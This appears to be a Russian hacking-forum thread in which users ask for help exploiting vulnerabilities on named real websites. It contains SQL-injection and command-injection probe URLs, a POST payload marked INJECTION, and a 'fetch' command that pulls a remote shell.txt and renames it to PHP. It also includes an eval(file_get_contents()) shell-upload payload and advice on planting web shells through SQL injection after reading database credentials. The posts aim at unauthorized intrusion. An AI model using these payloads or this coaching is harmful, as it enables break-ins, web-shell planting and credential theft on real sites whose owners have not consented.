Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. d1v

    d1v Elder - Старейшина

    Joined:
    21 Feb 2009
    Messages:
    676
    Likes Received:
    331
    Reputations:
    120
    нельзя. вот используй в своих мерах:
    http://forum.antichat.ru/thread79705.html
     
  2. eternal stud

    eternal stud New Member

    Joined:
    2 Jun 2010
    Messages:
    14
    Likes Received:
    0
    Reputations:
    0
    Через эту ошибку можно в базу залесть?
     
  3. M_script

    M_script Members of Antichat

    Joined:
    4 Nov 2004
    Messages:
    2,581
    Likes Received:
    1,317
    Reputations:
    1,557
    Melfis, ничего не получится, скобки тоже фильтруются
    http://mag.su/forum/login.php?sid=351f4eb4d8dbe4ea209f81a4e4bac4ff&username='0()'0&password=1
     
  4. eternal stud

    eternal stud New Member

    Joined:
    2 Jun 2010
    Messages:
    14
    Likes Received:
    0
    Reputations:
    0
    Подскажите пожалуйста, а с этим можно чего-нить сделать? Это вообще уязвимость или нет? - http://mag.su/maglove/viewprofiles.php?sid=1&next=1'
     
  5. eternal stud

    eternal stud New Member

    Joined:
    2 Jun 2010
    Messages:
    14
    Likes Received:
    0
    Reputations:
    0
    Как можно использовать это? http://mag.su/showimg.php?foto=;id;&width=$(w)&image=$(g)
     
  6. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    залей шелл через fetch )
     
    _________________________
    1 person likes this.
  7. sevenup

    sevenup Member

    Joined:
    4 Oct 2009
    Messages:
    100
    Likes Received:
    17
    Reputations:
    7
    fetch http://yousite.com/shell.txt; mv shell.txt shell.php;
     
  8. Cherep

    Cherep New Member

    Joined:
    30 May 2010
    Messages:
    158
    Likes Received:
    1
    Reputations:
    -10
    При попытке залить шелл через eval(file_get_contents('http://site.com/shell.txt')); (vBulletin 4) вылетает вот какая ошибка:
    http://pikucha.ru/i5NOd
     
  9. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,035
    Likes Received:
    534
    Reputations:
    935
    php интерпретатору не удалось получить информацию о удаленном хосте
     
    _________________________
  10. Cherep

    Cherep New Member

    Joined:
    30 May 2010
    Messages:
    158
    Likes Received:
    1
    Reputations:
    -10
    у меня какбы заходит спокойно по адресу шелла. И что делать?
     
  11. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,035
    Likes Received:
    534
    Reputations:
    935
    Использовать поиск по форуму: http://forum.antichat.ru/showthread.php?t=191917
    И внимательно читать не только первый пост.
     
    _________________________
    2 people like this.
  12. eclipse

    eclipse Member

    Joined:
    19 Dec 2010
    Messages:
    155
    Likes Received:
    74
    Reputations:
    85
    Помогите раскрутить SQL inj

    Уязвимая страница
    Code:
    http://www.allyachts.ru/YachtsSearch.asp?ret=2
    POST запросом отсылаем
    Code:
    actSearche=1&selectsearche=0&intsearche=2&strsearche=%26verf%3D%26Kind%3D%26intsearcheto1%3D85%26intsearchefrom1%3D2%2C35%26intsearcheto2%3D30%26intsearchefrom2%3D0%27&ID_Employees=&ID_Purpose=&ID_KindOfYachts=&ID_SeaWorthiness=&ID_MaterialBody=&ID_Engine=&ID_IntSearche1=1&intsearchefrom1=2%2C35&ifmin1=2%2C35&intsearcheto1=85&ifmax1=85&ID_IntSearche2=[COLOR=DarkRed]INJECTION[/COLOR]&intsearchefrom2=0&ifmin2=0&intsearcheto2=30&ifmax2=30
    тип БД - MSSQL

    Описание проблемы
     
  13. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    500
    Likes Received:
    33
    Reputations:
    12
    Эту скулю не раскрутить
     
  14. eclipse

    eclipse Member

    Joined:
    19 Dec 2010
    Messages:
    155
    Likes Received:
    74
    Reputations:
    85
    С чего ты взял? Аргументируй пож. ;)
     
  15. plaeer

    plaeer New Member

    Joined:
    8 Mar 2011
    Messages:
    149
    Likes Received:
    3
    Reputations:
    1
    Всем привет. Нашёл скулю на одном сайтике, через её посмотрел конфиг с паролями от БД, но муадмин не нашёл. Пробовал через шелл законектится с другого хоста, безрезультатно. Что можно сделать? очень нужен там шелл.
     
  16. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,413
    Likes Received:
    910
    Reputations:
    863
    если через скуль прочитал файл то через нее же попробуй залить шелл, для этого тебе надо знать относительный путь сайта и найти директорию разрешенную для заливки файлов
     
    _________________________
  17. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Кинь сайт в ПМ.
     
  18. eternal stud

    eternal stud New Member

    Joined:
    2 Jun 2010
    Messages:
    14
    Likes Received:
    0
    Reputations:
    0
    Можно как нить раскрутить вот это - http://ugroza.net:80/index.php?do=search&subaction=search&search_start=0&full_search=0&result_from=1&result_num=20&story=admin&dosearch=admin&titleonly=0&searchuser=\'&exactname=yes&replyless=0&replylimit=0&searchdate=0&beforeafter=after&sortby=date&resorder=desc&showposts=0&catlist[]=0&doclear=admin
    Заранее спасибо
     
  19. Melfis

    Melfis Elder - Старейшина

    Joined:
    25 Apr 2011
    Messages:
    505
    Likes Received:
    105
    Reputations:
    53
    нет, ковычки либо слешируются, либо вырезаются(и не только кавычки). Все параметры, вставляющие в запрос к базе, обрамлены кавычками.
     
  20. Cherep

    Cherep New Member

    Joined:
    30 May 2010
    Messages:
    158
    Likes Received:
    1
    Reputations:
    -10
    прочитал всёравно ничего полезного не нашел. Может ктонить помочь плз?
     
Thread Status:
Not open for further replies.